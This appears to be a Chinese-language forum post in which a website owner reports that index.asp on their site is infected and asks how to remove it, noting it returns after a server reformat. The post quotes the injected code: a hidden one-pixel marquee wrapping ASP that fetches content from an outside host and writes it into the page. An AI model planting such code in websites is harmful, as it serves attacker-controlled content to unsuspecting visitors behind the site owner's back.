急,中了网页病毒。在我首页里加了代码。怎么杀呀?
加的代码为:
<MARQUEE
onmouseover=this.stop()
onmouseout=this.start()
scrollAmount=30 scrollDelay=0 direction=up height=1>
<%
On Error Resume Next
Server.ScriptTimeOut=9999999
response.write(getHTTPPage("http://www.sun579.com/superlink/index2.asp"))
Function getHTTPPage(Path)
t = GetBody(Path)
getHTTPPage=BytesToBstr(t,"GB2312")
End function
Function GetBody(url)
on error resume next
Set Retrieval = Create
Object("Microsoft.XMLHTTP")
With Retrieval
.Open "Get", url, False, "", ""
.Send
GetBody = .ResponseBody
End With
Set Retrieval = Nothing
End Function
Function BytesToBstr(body,Cset)
dim objstream
set objstream = Server.Create
Object("adodb.stream")
objstream.Type = 1
objstream.Mode =3
objstream.Open
objstream.Write body
objstream.Position = 0
objstream.Type = 2
objstream.Charset = Cset
BytesToBstr = objstream.ReadText
objstream.Close
set objstream = nothing
End Function
%>
</marquee>
怎么杀呀。
服务器格过后,重装的,就又有了。
杀过木马。
好像只感染index.asp文件